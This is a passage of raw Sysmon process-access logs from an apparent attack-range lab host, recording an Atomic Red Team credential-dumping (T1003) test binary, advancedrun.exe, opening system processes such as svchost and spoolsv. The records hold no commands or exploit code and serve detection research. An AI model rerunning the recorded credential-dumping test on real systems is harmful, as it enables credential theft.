Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 